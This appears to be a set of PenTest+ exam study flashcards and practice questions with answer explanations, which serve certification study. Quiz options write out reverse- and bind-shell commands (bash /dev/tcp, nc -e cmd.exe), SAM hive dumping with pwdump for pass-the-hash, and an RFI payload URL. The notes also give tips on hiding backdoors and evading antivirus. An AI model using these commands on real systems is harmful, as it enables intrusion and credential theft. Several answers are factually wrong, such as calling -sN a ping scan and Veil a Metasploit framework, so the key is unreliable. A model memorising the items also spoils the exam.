Pentest+
The rules of engagement (RoE)
The rules of engagement (RoE) specify the allowed actions and allowed targets. The rules of engagement can also include a schedule of activities and time frames in which activities should be conducted. They typically do not include a schedule of payments.
A network security analyst is performing a vulnerability scan and gathering information on network hosts. They want to use ICMP traffic to determine whether a host is online and responsive. Which of the following Nmap commands would produce these results? A) -sU B) -sF C) -sN D) -sT
C) -sN #A ping scan (-sn) sends an ICMP echo request packet to the target. If the target responds to the ICMP echo reply, then it is considered alive and responsive. #nmap -sF: sets only the FIN flag on a packet. This type of scan determines if a target system's ports are open or closed and has the added benefit of being stealthier than a TCP connect scan.
An incident responder discovers the following code that has infected an IoT device: Killer_kill_by_port (htons(23)) What can the incident responder conclude from inspecting the code? A) The malware is carrying out a GRE flood. B) The malware is attempting to eradicate other botnet processes. C) The malware is attempting to kill the SSH service and prevent it from restarting. D) The malware is attempting to kill the Telnet service and prevent it from restarting.
D) The malware is attempting to kill the Telnet service and prevent it from restarting. #This code is part of advanced malware (such as Mirai, which targeted Dyn servers in 2016) that is designed to find and infect IoT devices. After infection, the devices become a launch pad for DDoS attacks. The specific kill process is a way for the code to protect itself. It would kill other processes running SSH, Telnet, and HTTP to prevent the owner from gaining remote access to the IoT device while it is infected. NOTE: While this specific line of code is not responsible, malware can also launch different types of attacks, such as a GRE flood, where inbound traffic is designed to look like it is generic routing encapsulation (GRE) data packets. GRE is a communication protocol used to establish a direct, point-to-point connection between network nodes.
You need to confirm the security of passwords created by users in the Sales department. Which of the following is the strongest password? A) MyP@$$word B) 1589466 C) password5! D) WeBl0ck!ntru$ions
D) WeBl0ck!ntru$ions #WeBl0ck!ntru$ions is the strongest password of these options because it contains all four character types (uppercase letters, lowercase letters, numbers, and symbols). This means each position in the password has 86 possible characters (upper case: 26, lower case: 26, numbers: 10, symbols: 24), making it very hard to crack.
Which action or activity is most likely to help an organization when planning for their next penetration test? A) attestation of findings B) client acceptance C) post-engagement cleanup D) lessons learned
D) lessons learned NOTE: Post-engagement cleanup ensures that all systems and devices are returned to their original, pre-test state.
You want to employ a Linux distribution mainly aimed at network security monitoring. Which Linux distribution would BEST support network security monitoring? A) DEFT B) Skadi C) ADIA D) Security Onion
D) Security Onion #Security Onion is a Linux distribution mainly aimed at network security monitoring. It also has other advanced forensic analysis tools.
As a penetration tester, you ran a scan against the interconn.com domain. Which of the following list of vulnerabilities is MOST critical and should be at the top of your list for exploitation later? A) Full path disclosure B) Expired certificate C) Clickjacking D) Stored XSS
D) Stored XSS #XSS is definitely the highest priority, coz if cyber criminals find it, they can do all kinds of nasty stuff, such as browser re-directs, browser hijacking, crypto mining, and web application defacing.
Directory traversal
Directory traversal is a way of gaining unauthorized file system access. In a directory traversal attack, also known as path traversal, an attacker enters information in a web form, URL address line, or another input method that gives them access to a file or directory that they shouldn't have access to, such as adding some periods and a backslash into the address to get to the parent directory.
file inclusion attack
File inclusions themselves are normal, and useful, parts of a server-side scripting language. They are there to help in maintenance, update, and for code-editing. They are there also to allow web applications to pull and read files from the server's file system.
linkjacking
Linkjacking is a practice used to redirect one website's links to another. Usually, this is accomplished by submitting someone else's content to an aggregator website, which in turn drives traffic to the secondary site, rather than that of the original creator. This is more about driving traffic to a competitor's site and not the site's original intent.
Similarity between Local file inclusion (LFI), XSS and remote file inclusion (RFI)
Local file inclusion (LFI) and remote file inclusion (RFI) are similar to the nefarious cross site scripting (XSS) attacks. All of them are forms of code injection, with LFI being less sophisticated and therefore easily preventable. RFI is a method which allows an attacker to employ a script to include a remotely hosted file on the web server. LFI is very similar to RFI, the only difference being that to carry out the LFI attack, the attacker has to use local files on the current server, and RFI uses remote files.
RFID Cloning attack
RFID cloning attack. In this attack, RFID tag information is captured wirelessly as it is transmitting between label and reader. In some cases, this cloned information may be that which is required to enter a secure room or area (user badges).
De-confliction
A de-confliction occurs when issues no longer conflict with one another. For example, you may discover a vulnerability on a server that requires an update to an application. However, the team that uses the application did not want the update deployed because it changes the way several features operate. If the vulnerability is not critical, you could decide not to deploy the update. But if the update patches critical security issues, you may need to offer the team training so that the update can be made.
Juice Jacking
A juice jacking attack occurs when a user plugs into an unsecured public charging port or uses an infected cable. The attack uses a charging port or infected cable to exfiltrate data from the connected device or upload malware onto the device. To deal with this situation, use a USB condom (a USB device that has the data transfer line removed) or just use your phone's charger or an external charging battery. In this scenario the employee did not plug in anything. They just clicked a link.
Similarity between DNS poisoning and ARP poisoning
#DNS poisoning - occurs when IP addresses and host names are given out with the goal of traffic diversion #DNS poisoning is similar to ARP poisoning. With ARP poisoning, an attacker sends fake ("spoofed") Address Resolution Protocol (ARP) messages on a network with the goal of traffic diversion.
Hydra Mimikatz Medusa
#Hydra is an active tool which interacts with the targeted server. It goes down a list of username/password combinations, in an attempt to brute-force its way in. It is best to know information beforehand, such as a username. It is the password cracking tool supports parallel testing of several network authentication types simultaneously. #Mimikatz retrieves hashed passwords from memory. It is used by both penetration testers, and even malware. Gathers credentials by extracting key elements such as cleartext passwords, hashes and PIN codes. #Medusa is a credential brute-forcing tool. It is similar to Hydra.
main goals of the PCI-DSS
1) Build and Maintain a Secure Network 2) Protect Cardholder Data 3) Maintain a Vulnerability Management Program 4) Implement Strong Access Control Measures 5) Regularly Monitor and Test Networks 6) Maintain an Information Security Policy
Settings to configure before running Proxychains.
1) Chain type - Dynamic, strict, or random. Dynamic and strict will go through each proxy in the list one at a time, while random will skip around the proxy list. There is also a chain length setting for random chains to specify how many proxies to chain together. 2) Proxy DNS requests - If this option is not set, DNS requests will not be sent through proxies, and that DNS data can be used to track your system. The only reason to disable this setting is for speed. 3) Proxy list - This is the primary list used by Proxychains to direct data. You must have the protocol (SOCKS4/5 or HTTP/S), the IP address, and the port number of each proxy. If the proxy is authenticated, you can also include a username and password in cleartext.
Attacks
1) Dictionary attack - occurs when a hacker tries to guess passwords using a list of common words 2) DoS attack - occurs when a server or resource is overloaded so that legitimate users cannot access it 3) Pharming attack - occurs when traffic is redirected to a site that looks identical to the intended site 4) Phishing attack - occurs when confidential information is requested by an entity that appears to be legitimate 5) Advanced persistent threat (APT) - a group of organized individuals from an enemy country is responsible for various attempts to breach the company network using sophisticated and targeted attacks. 6) Malicious insider threat - an employee downloads intellectual property from a server to a USB drive to sell to a competitor. 7) Spear phishing - an e-mail spoofing attack appears to come from a figure of authority seeking access to confidential data. 8) Privilege escalation - an attacker exploits an application design flaw to gain elevated access to protected resources.
Attack Vector (AV) Measurements (in regards to Q.no. 42)
1) If the AV measurement were N or Network, it would be necessary to encrypt both internal and external communications with the server. 2) If the AV measurement were A or Adjacent, it would be necessary to encrypt the communications of the entire internal network with the server. 3) If the AV measurement were L or Local, it would be necessary to encrypt the communications of the local network with the server.
JPCERT US-CERT CVE
1) Japan Computer Emergency Response Team (JPCERT) coordinates with Japanese network service providers, security vendors, and government agencies to provide incident response. They also gather and disseminate technical information on computer security incidents and vulnerabilities and security fixes, and other security information, as well as issue alerts and warnings. 2) The U.S. Computer Emergency Readiness Team (US-CERT) is an organization that was established by the U.S. Department of Homeland Security to analyze and reduce cyber threats and vulnerabilities, disseminate cyber threat warning information, and coordinate incident response activities. However, they do not provide security compliance standards. 3) Common Vulnerabilities and Exposure (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized description for each vulnerability or exposure, they are more of a dictionary than a database. CVE helps provide rankings on discovered vulnerabilities but does not provide security compliance standards.
What's not included in Rules of engagement (ROE)?
1) Rules of engagement rarely include deploying mitigations, especially when a contractor is being used. Rules of engagement may include approval to deploy mitigations if an internal penetration test is being completed. 2) The rules of engagement do not usually include taking the appropriate precautions or deploying mitigations unless an internal penetration test is being completed.
Setting parameters while scanning
1) The parameter -T5 is the most aggressive timing template. Timing templates are specified with the -T command and range from the numbers 0 through 5. 2) The parameter -T0 takes the longest time to scan a network and is extremely unlikely to set off any IDS alerts due to the slow speed of packets. 3) The parameter -T5 is much quicker but is very likely to set of IDS alerts.
Types of scan
1) The sensitivity level is the type of scan (discovery scan or assessment scan). The scope is the range of computers you want to scan. The authentication method in this case should be credentialed because the servers contain confidential data. 2) A discovery scan simply provides an inventory of discovered hosts. An assessment scan will actually assess all the hosts based on the criteria given (such as IP address). 3) A credentialed scan will use login credentials of a privileged account to access data that is protected by access control lists (ACLs). A non-credentialed scan would be unable to scan certain areas on the hosts. 4) Dynamic scans are performed while the software is running, preferably in a sandbox or non-production environment, and do not have back-end access to the code. 5) Vulnerability scanning is a category of tools under the Dynamic Application Security Testing (DAST) tools. It is always best to run vulnerability scanning against a web application because it is going to find issues such as cross-site scripting, SQL injection, and command injection. A good example of this tool is Open Web Application Security Project Zed Attack Proxy, or OWASP ZAP. 6) Compliance scans, by their very nature, are only interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA.
Some Nmap scripts
1) The smb-enum-shares.nse script retrieves information about remote shares. This technique can even display private files which is an opportunity for data exfiltration or malware propagation. 2) The smb-enum-services.nse script discovers services running on a remote system. The enumeration results, which can only be produced when running the scan from a privileged account, can also list service status (active or inactive). 3) The http-enum.nse script enumerates directories used by web applications and servers. It is an intelligent, highly accurate script capable of pattern recognition to identify specific version of web applications while avoiding false positive results.
You are working for a contracting company that was employed by the federal government. Which organization's publications are likely to be most closely related to your security compliance standards? A) NIST B) JPCERT C) US-CERT D) CVE
A) NIST #The National Institute of Standards and Technology (NIST) is an agency of the U.S Department of Commerce. Its main focus is to promote innovation and assessing organizations in the risk they encounter. Their publications will be most closely related to your security compliance standards.
You are a Linux system administrator. You have automated a process, and you want all of the output and error logs to be recorded in a file without your intervention. Which of these following operators will you use? A) &> B) > C) < D) |
A) &> The &> operator directs both output and error streams to a file. In Linux, input streams provide input to programs and output streams usually print text characters to the terminal (computer monitor). You use the > or >> operators to direct output to a file. The > symbol creates a file containing the standard output. The >> symbol appends an existing file with the standard output. For example, the following command will write the echoed message to the File1 file: $ echo "Write">File1 NOTE: 1) The > character in the echo command above is called a file descriptor. If File1 already exists, the command will overwrite it. If you want to prevent files from being overwritten, you need to set the noclobber option of the shell: $ set -o noclobber 2) The < operator redirects standard input from a file onto the screen. The following command uses the tr command to replace spaces in the File1 file with tabs, and displays the output on screen using the < operator: $ tr ' ' '\t'<File1 3) The pipe (|) operator creates pipelines between commands, which means that you pipe the output of one command to another command as its input. In the following example, you pipe the output of the ls command to the sort command to display the files sorted by name: $ ls F* 2>&1 |sort A sample output of this command is as follows: File1 File2 File3
You want to share the results of your Nmap with other members of your team. Which parameter stores scan results in Normal, XML, and Grep-able formats? A) -oA B) -oN C) -oX D) -oG
A) -oA #The -oA parameter of the Nmap stores outputs in Normal, XML, and Grep-able output formats all at once. #The -oX parameter of the Nmap command changes the output behavior to an XML output. XML is easily parsed by software, which makes it preferred for many applications. #The -oN parameter of the Nmap command changes the output behavior to a normal output. It is meant for human users to read, and the output will be analyzed. #The -oG parameter of the Nmap command changes the output behavior to a Grep-able output. This format is easy to manipulate with simple Unix tools.
While performing a penetration test, a contractor discovers a vulnerability that is being actively used to attack the company's Web server. The contractor knows how to implement the mitigation for the vulnerability and has the appropriate access to do so. Which two actions should the contractor take? A) Escalate the issue according to the rules of engagement and suggest the appropriate mitigation. B) Log in and deploy the appropriate mitigation. C) Shut down the Web server until the appropriate mitigation can be deployed. D) Document the findings with an executive summary, recommendations, and screenshots of the vulnerability. E) Notify management regarding the findings and suggest the appropriate mitigation.
A) Escalate the issue according to the rules of engagement and suggest the appropriate mitigation. D) Document the findings with an executive summary, recommendations, and screenshots of the vulnerability. #Escalation is an appropriate action based on the rules of engagement, and documentation is an appropriate action because this vulnerability is a finding of the penetration test. #The contractors should not notify management regarding his findings and suggest the appropriate mitigation. Management will only want the details in the executive summary and is not usually involved in the escalation procedures documented in the rules of engagement.
During a recent penetration test, you discovered that passwords for an internal application were stored in plaintext. You must ensure that passwords cannot be read. You need to recommend the BEST remediation for this issue only. What should you recommend? A) Hash all passwords and then encrypt the password file. B) Hash all passwords and increase password complexity. C) Encrypt all passwords and implement multi-factor authentication. D) Increase password complexity and implement multi-factor authentication.
A) Hash all passwords and then encrypt the password file. #The best remediation for passwords stored in plaintext is to hash all passwords and then encrypt the password file. This will ensure that it is much harder to discover the passwords. NOTE: You would not recommend hashing all passwords and increasing password complexity. Password complexity will not prevent the passwords from being stored in plaintext. Multi-factor authentication will also be not effective in this case.
You are designing a pen test that mimics the activities of a script kiddie. Which of the following activities should you most likely perform as this "type of attacker"? A) Impersonate a technician that was laid off. B) Perform a SQL injection. C) Post political message on your website. D) Steal funds.
A) Impersonate a technician that was laid off. #Activities, such as impersonating a laid off technician, could be done using any of the options but is MOST like the actions of a script kiddie. These hackers are not technically advanced, use prepacked attack tools that they may or may not understand, and use well-known methods. #Script kiddies do not have in-depth hacking skills or knowledge and are limited to using tools and scripts created by other hackers, so they can't execute SQL injection, APT or steal funds.
After all your scans and tests, you must determine if a vulnerability is exploitable. First you need to identify an exploit for the vulnerability. Then you must prioritize your vulnerabilities. Standard protocol would have you start with the highest-severity vulnerabilities that have the greatest likelihood of being exploited. Which of the following would you use to prioritize your vulnerabilities/exploits by the highest severity? (Choose three.) A) It has a matching module in the Metasploit framework. B) It was found via a mass vulnerability scan. C) It is not on a critical server, but is being actively exploited. D) The CVSS V2 database says it has a 9.0 base score or higher.
A) It has a matching module in the Metasploit framework. C) It is not on a critical server, but is being actively exploited. D) The CVSS V2 database says it has a 9.0 base score or higher. #As a general rule, if a vulnerability has a matching module in Metasploit, it should almost always be considered high severity. That means that it has been out for long enough and has been seen in enough hacking attempts for someone to have created a module for it. #Also, if you run across an exploit that is alive and being actively exploited, another general rule of thumb is to tell your client immediately. There may be confidential information leaking out to the hackers. #CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10. Level 9 in both the CVSS V2 and V3 rating is severe. Please fix these issues immediately. #The mass vulnerability scan findings are not a high-priority finding. Those must be vetted to make sure they are not a false positive.
Given a command: nmap -v -sV -O -sS -T2 192.168.1.1, what is the primary function of the -O switch? A) OS fingerprinting B) Service identification C) Ping scan D) Port selection
A) OS fingerprinting #The Nmap command -O is used for OS detection/fingerprinting. #The -p command of the Nmap command performs port selection. #The -sV parameter of the Nmap command performs service identification. This gives information on services running, including mail or DNS server services. This could help determine the exploits to which a server could be vulnerable. #The -sN parameter of the Nmap command performs a ping scan. It sends an ICMP echo packet by default. If the target responds, then it is alive. If not, the target is considered offline.
You are doing a penetration test for InterConn, and in your reconnaissance, you find their website with a front-facing web application. It seems like their input fields are not filtered. Which attack method is the BEST one to use in this scenario? A) SQL injection B) DDoS C) XSS D) Brute force
A) SQL injection #The best attack to use in this scenario is SQL injection. SQL injection could allow you access to the database for usernames, emails, and passwords. Therefore, it is the BEST option in this scenario. You need to attack the site, not the clients that use the site, so a SQL injection would make the most sense as it attacks the server and not the clients. NOTE: In this case, DDoS would make InterConn's site go down, not give us access to the devices. DDoS is a variant of DOS, where multiple systems, known as zombies, bots, or drones, flood the target in single botnet, so as to bring down the system more efficiently and anonymously.
Service disruptions, error messages, and log entries caused by scans may attract attention from a cybersecurity team that causes them to adjust defenses to obstruct a penetration test. Which of these Nmap scans would a tester use to try to remain undetected? A) Stealth scan B) Unauthenticated scan C) Authenticated scan D) Full scan
A) Stealth scan #A stealth scan (-sS) performs reconnaissance on a network while trying to remain undetected. It is a relatively quiet and stealthy scan as it never completes the TCP handshake and never establishes a connection. A slow scan speed can also contribute to scan stealthiness.
A penetration tester runs the following commands from a compromised system: python -c import pty;pty.spawn (/bin/bash) Which action is the tester taking? A) Upgrading the shell B) Capturing credentials C) Opening a new empty terminal D) Removing the Bash history
A) Upgrading the shell #The tester is upgrading the shell. It is an amazing feeling to pop a shell into a server through netcat or Metasploit. However, if you run a bad command and cause your shell to hang, you would need to use CTRL+c to kill that shell and start over again to reconnect. Some commands, like su and ssh, require a full proper terminal to run. Using Python, you can upgrade your shell to do more robust work. NOTE: Capturing credentials is not the purpose of the commands. There are many ways of doing that, a lot of which are in Metasploit and other tools.
As part of a penetration test, you aim to evade antivirus checks that the target organization has put in place. Which of the following frameworks would you use? A) Veil B) W3AF C) Nikto D) Tor
A) Veil #Veil is a Metasploit framework typically used to evade both security controls and antivirus. #Tor (The Onion Router) is a tool which allows for the user to browse the internet anonymously. It does this by routing IP traffic through an expansive network of Tor relays, constantly changing the way it routes this traffic. This in turn obscures the user's location and makes it extremely difficult to trace traffic back to the user.
A web application is finally finished. The developer wants to test the code of the application for errors and weaknesses before it goes out to a full Q/A. Which of the following scan processes should the software developer perform? (Choose two.) A) Vulnerability B) Static C) Compliance D) Dynamic
A) Vulnerability D) Dynamic #The software developer should perform a dynamic vulnerability scan. Dynamic scans are performed while the software is running, preferably in a sandbox or non-production environment, and do not have back-end access to the code. #Static analysis is what the name implies, investigating something when it is not up and running. NOTE: Compliance scans, by their very nature, are only interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA. In this scenario, the developer should perform an overall vulnerability/dynamic scanning of this web app for errors and weaknesses.
Which of the following types of pen test would be most appropriate for assessing the potential of an internal attack? A) White box B) Red box C) Gray box D) Black box
A) White box #In a white-box assessment, the testers are given as much information about the network as an employee would have. This knowledge helps the tester assess the potential for an insider attack. #In a black-box assessment, the tester is given NO information about the network. This type of pen test assesses the potential for an external attack. #In a gray-box assessment, the attacker is given some information about the existing network, but not all. A grey-box assessment includes more background information than a black-box test, but less than a white-box test. NOTE: Red box does not exist!!!! Duhh!!
As a pen tester, covering your tracks is as important, maybe more, than lateral movement in the post-exploitation process. Which of the following should you NOT do to cover your tracks? A) You should infect most of the hosts on the company's network to hide your movement. B) You should vary your malware on the network. C) You should use a VPN to facilitate bypassing some network monitoring. D) You should secretly deploy backdoors.
A) You should infect most of the hosts on the company's network to hide your movement. #If you infect, your presence will be put out in the open. If you only infect a few hosts and keep them updated, then the intrusion detection systems (IDSs) may not detect your presence, and it will be harder for incident response to deal with it.
Which of the following entities would most likely require an attestation of findings after the completion of a penetration test? (Choose all that apply.) A) federal, state, or local government B) partner C) competitor D) regulatory agency
A) federal, state, or local government B) partner D) regulatory agency #Partner contracts may contain stipulations regarding security and penetration test. As a result, organizations may need an attestation of findings for compliance. #Federal, state, or local governmental regulations or regulatory agencies may require an organization to provide (or keep on hand) an attestation of findings to provide compliance.
You have been hired to conduct a pentest of an organization. What would be a correct way to scan the HTTP port of the given host using the most aggressive timing template? A) nmap -p80 -T5 10.10.10.10/24 B) nmap -sS443 -T5 10.10.10.10/24 C) nmap -sS80 -T0 10.10.10.10/24 D) nmap -p 443 -T1 10.10.10.10/24
A) nmap -p80 -T5 10.10.10.10/24 #The command nmap -p80 -T5 10.10.10.10/24 is the correct way to select the HTTP port in an Nmap scan. The parameter -T5 is the most aggressive timing template. Timing templates are specified with the -T command and range from the numbers 0 through 5. The parameter -T0 takes the longest time to scan a network and is extremely unlikely to set off any IDS alerts due to the slow speed of packets. The parameter -T5 is much quicker but is very likely to set of IDS alerts.
You are reviewing the command shells from the following target and attacker systems: 172.18.60.249 - Laptop running Kali Linux 172.18.60.251 - Desktop running Windows 7 172.18.60.252 - Server running BlackArch Linux Which of the following commands/outputs demonstrate a successful bind shell? (Choose all that apply.) A) root@kali:~# nc 172.18.60.251 4444 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> B) root@kali:~# nc -lvp 4444 listening on [any] 4444 ... connect to [172.18.60.249] from win7.home.net [172.18.60.251] 49435 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> C) Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> nc.exe -lvp 4444 -e cmd.exe listening on [any] 4444 ... connect to [172.18.60.251] from kali.home.net [172.18.60.249] 44348 D) [root@blackarch ~]# bash -i>& /dev/tcp/172.18.60.249/4444 0>&1 E) Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> nc.exe 172.18.60.249 4444 -e cmd.exe F) root@kali:~# nc -lvp 4444 listening on [any] 4444 ... connect to [172.18.60.249] from blackarch.home.net [172.18.60.252] 44612 [root@blackarch ~]#
A) root@kali:~# nc 172.18.60.251 4444 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> C) Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> nc.exe -lvp 4444 -e cmd.exe listening on [any] 4444 ... connect to [172.18.60.251] from kali.home.net [172.18.60.249] 44348 NOTE: The remaining outputs depict reverse shell, not bind shell. In reverse shell, the network service listens on the attacker host, the target then passes the shell to the attacker, and the attacker host executes shell commands remotely on the target host.
Your company has requested that a retest be carried out within weeks of receiving a penetration test report from a contractor. What is the best reason for doing this? A) to verify that identified vulnerabilities have been mitigated B) to reprioritize the goals of the penetration test C) to discover if a prior compromise has occurred D) to determine if the results were valid
A) to verify that identified vulnerabilities have been mitigated #A company would request that a retest be carried out within weeks of a penetration test report to verify that identified vulnerabilities have been mitigated. Retesting is a vital follow-up action to ensure that the findings of the penetration test have been addressed. #The best way to determine if the results were valid is to research the conditions of your enterprise as compared with the penetration test. Valid findings would be corroborated by your research. #If a prior compromise has occurred, the tester should have noted that in the report. In addition, the company should have been notified that a compromise was detected at the time that the compromise was discovered.
ARP spoofing attack.
ARP spoofing involves creating a gratuitous ARP message (ARP replies that are not requested but are still processed by all machines which update their ARP caches). This usually maps a system IP address to the MAC address of the hacker, sending all traffic to the attacker. For the best effect, the attacker maps the IP address of the victim's router or gateway, sending all traffic leaving the network to the attacker rather than to the gateway.
Unauthenticated scan vs. authenticated scan
An unauthenticated scan is a method for reviewing your network for vulnerabilities without having to log in as an authorized user. It is not, in and of itself, an option for nmap, but more a description of how and when you are running a scan. An authenticated scan allows you to tap into your network assets, data, device, or any element that is part of that particular network's framework that supports information related activities.
You have been tasked with scanning a network for all of the devices connected to that network. Because Nmap uses host discovery to detect and further probe only the active devices, you want to skip the host discovery phase as a whole. Which Nmap command option disables host discovery? A) -p B) -Pn C) -sn D) -sT
B) -Pn #nmap -p : specifies a port to scan. #nmap - sN: performs Ping scan. #nmap -sT: performs a TCP connect scan.
You are designing a pen test in which you want to see if you can successfully send unsolicited text messages to company smartphones and laptops. What type of attack are you simulating? A) WPS implementation weakness B) Bluejacking C) RFID cloning D) Jamming
B) Bluejacking #You are testing the likelihood that a Bluejacking attack will succeed. In this attack, the Bluetooth service is utilized to send unsolicited text messages to devices where the Bluetooth service is enabled and the device is left in a discoverable mode.
During the first stage of a penetration test, you discover a possible critical vulnerability. You immediately communicate with certain project stakeholders regarding this vulnerability. However, during the second stage, you discover that the severity of this vulnerability decreases based on new findings. Which of the following should you report? A) Indication of compromise B) De-escalation C) Critical finding D) De-confliction
B) De-escalation #You should report a de-escalation of the vulnerability. Often vulnerabilities that are discovered will be de-escalated based on other findings. If a previously reported critical vulnerability is found to be no longer critical, you should report this new finding to the stakeholders.
Your goal is to crack a password that is encrypted in the ciphertext format. Which of the following would you use if you wished to crack the password offline? A) Medusa B) John the Ripper C) Hydra D) Mimikatz
B) John the Ripper #John the Ripper is an extremely popular tool which is used for password cracking. It works offline and uses both search patterns and wordlists to crack passwords. There are many different ciphertext formats the tool understands.
Which of the following is an open-source fuzzer created by Cisco? A) AFL B) Mutiny Fuzzing Network C) Peach D) Recon-ng
B) Mutiny Fuzzing Network #Mutiny Fuzzing Framework is an open-source fuzzer created by Cisco. It functions by replaying pcaps through a mutational fuzzer. #Recon-ng is a tool which comes with Kali Linux, and is used to automate the information gathering of Open Source Intelligence (OSINT).
What tool was primarily designed to brute force both directory and file names on web application servers? A) Nessus B) OWASP ZAP C) W3AF D) Nikto
B) OWASP ZAP #Actually, originally, Dirbuster was primarily designed to brute force both directory and file names on web application servers. However, it is an inactive project and has been integrated into OWASP's ZAP.
While attacking InterConn's network, you see an attack vector against their server using the following address: http://example.interconn.com/example.php?file=http://www.malicious-example.com/malicious.php What attack is being used here? A) SQL injection B) RFI C) Directory traversal D) XSS
B) RFI #Remote file inclusion (RFI) is being used here. RFI is an attack vector that was more popular several years ago, but unfortunately people and companies are still lazy about sanitizing PHP: Hypertext Preprocessor (PHP). PHP is a general-purpose programming language used with HTML to create web sites. You can still find ways of running shells in the scenario being described.
The client has developed a payment schedule for a pen test that makes the largest payment at the time of the report delivery. Where is this information recorded? A) NDA B) SOW C) MSA D) Rules of engagement
B) SOW #The statement of work (SOW) defines a number of details concerning a pen test. They include: Timelines, including the report delivery schedule; Scope of the work to be performed; Location of the work (geographic location or network location); Technical and nontechnical requirements; Cost of the penetration tests; Payment schedule
To perform network reconnaissance, you use Nmap to perform a SYN scan. After completing this scan, you want to create more custom packets and gain more control over the traffic you are sending. Which tool should you use to do this? A) DNSrecon B) Scapy C) Recon-ng D) Metasploit
B) Scapy #Scapy is a program in which enables users to create, adjust, modify, and send network packets. It allows the user to gain more control over the packets being sent.
During the penetration testing planning session, the organization has decided to use CVSS scores to help determine the criticality of any discovered vulnerabilities. Which one of these CVSS groups does NOT receive a score in the CVSS system? A) Temporal B) Security C) Base D) Environmental
B) Security #An overall Common Vulnerability Scoring System (CVSS) score is generated using three group scores: 1) Base group: represents characteristics of a vulnerability that are constant over time and do not depend on the environment. 2) Temporal group: assesses a vulnerability as it changes over time. 3) Environmental group: represents the characteristics of a vulnerability, taking into account the organizational environment. There is no Security group in the CVSS system.
Which of the following is MOST likely to be affected by the Wassenaar Arrangement? A) The permitted time periods in which pen testing can occur B) The tools that can be used to perform the pen test C) The permitted locations for pen testing to occur D) The identity of the individuals who can perform the pen test
B) The tools that can be used to perform the pen test #The Wassenaar Arrangement was established for export control of conventional arms and dual-use (civilian/military) goods and technologies. Some of the tools used in pen testing might incorporate technologies that may not be allowed to be used in the country where the organization undergoing the test is headquartered or located. NOTE: These types of export restrictions cover technologies and products and do not address issues such as the identity of the tester, the permitted locations, or time periods.
Which of the following is a social engineering attack that can be mitigated with card or badge covers? A) piggybacking B) badge cloning C) shoulder surfing D) fence jumping
B) badge cloning #Since badge cloning is done wirelessly, shielded badge holders are card cases or sleeves that contain a thin layer of metal. This metal serves as a barrier between the enclosed card and an RFID reader, legitimate or malicious.
One of the pen testers was successful in cloning the company's AP, jamming the frequency on which the company's AP operates and causing several clients to associate with the fake AP. The users have a preconfigured WLAN profile that specifies the proper SSID, and for user convenience, also specifies their WLAN credentials. What type of attack is MOST LIKELY being conducted? A) deauthentication attack B) credential harvesting C) KARMA attack D) fragmentation attack
B) credential harvesting #When the AP's operating frequency is jammed, it causes all stations to disconnect from the AP. Then the stations will do as they are designed and will seek another AP with the same SSID. When they locate the fake AP, they will send probe requests. The probe requests will include the credentials specified in the scenario, which can then be harvested. #A wireless fragmentation attack is designed to capture elements of the pseudo-random generation algorithm (PRGA) and does not include the use of a fake AP. NOTE: DoS attack is a deauthentication attack.
During the planning for a penetration test, one of the organizational security team members described an attack that occurred recently. In that attack, the attackers forced a system to use a less secure version of TLS that led to the cracking of an encryption key. The team member would like the pen testers to assess the likelihood that it could occur successfully again. What attack do the testers need to simulate? A) jamming B) downgrade C) repeating D) Bluesnarfing
B) downgrade #The pen testers need to simulate a downgrade attack. This attack forces a system to use a weaker encryption protocol, one that makes it easier to crack the key. The Padding Oracle On Downgraded Legacy Encryption (POODLE) vulnerability in OpenSSL is an example.
You performed a pen test for a retail organization that processes credit card information. During the test you identified several sensitive credit card items were stored with other data that was widely available to users. What concept required by PCI-DSS would rectify this situation? A) intrusion prevention systems B) network segmentation C) next generation firewalls D) key management
B) network segmentation #In general, when dealing with any compliance-based pen test, the penetration tester should verify the presence of the following best practices: Data isolation Secure key management Proper password policies
You are evaluating whether a Windows server is vulnerable to a pass-the-hash attack. You need to retrieve system account password hashes, such as the following output: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Which command-line statement should you run? A) lsadump SYSTEM.10.201.42.149 SECURITY.10.201.42.149 B) pwdump SYSTEM.10.201.42.149 SAM.10.201.42.149 C) reg.exe save HKLM\SAM SAM.10.201.42.149 D) reg.exe save HKLM\SYSTEM SYSTEM.10.201.42.149 E) reg.exe save HKLM\SECURITY SECURITY.10.201.42.149 F) pwdump SYSTEM.10.201.42.149 SECURITY.10.201.42.149
B) pwdump SYSTEM.10.201.42.149 SAM.10.201.42.149 #The pwdump command uses the SYSTEM and SAM registry hives to output the Windows Local Manager/NT system hashes, as indicated by the scenario output. Instead of cracking a password by using its hash, you can instead attempt to reuse the hashed password directly because remote services only need the hash, not the plaintext password. NOTE: You would not run the reg.exe save command to retrieve the password hashes, but you will need to run it on the target Windows server prior to using pwdump. The reg.exe save command will retrieve the registry hives needed by creddump, namely SYSTEM, SECURITY, and SAM, and store them in offline files. You should not run the lsadump command because this command will output the Local Security Authority (LSA) secrets, not password hashes. Typically, this command is used to retrieve the NL$KM value, which is the key used to encrypt cached domain passwords.
Covering your tracks as a pen-tester
By: 1) deploying backdoors to allow you persistence in some of the hosts. As long as they are hidden or encrypted, then your tracks are covered, and you do not have to re-hack your way back in to the network. 2) varying your malware on the network. Having a massive malware dump of the same kind with the same signature will set off enterprise alerts. If you have a few, varied malware on the systems, it can throw off incident response. 3) Using a VPN to facilitate bypassing some network monitoring. Of course, you should hide your IP address to eliminate fingers being pointed back to you. Most VPNs can be double servers, or Peer-to Peer (P2P) encrypted. Peer-to-peer encryption is creating a file sharing (i.e. torrent) of network between hosts.
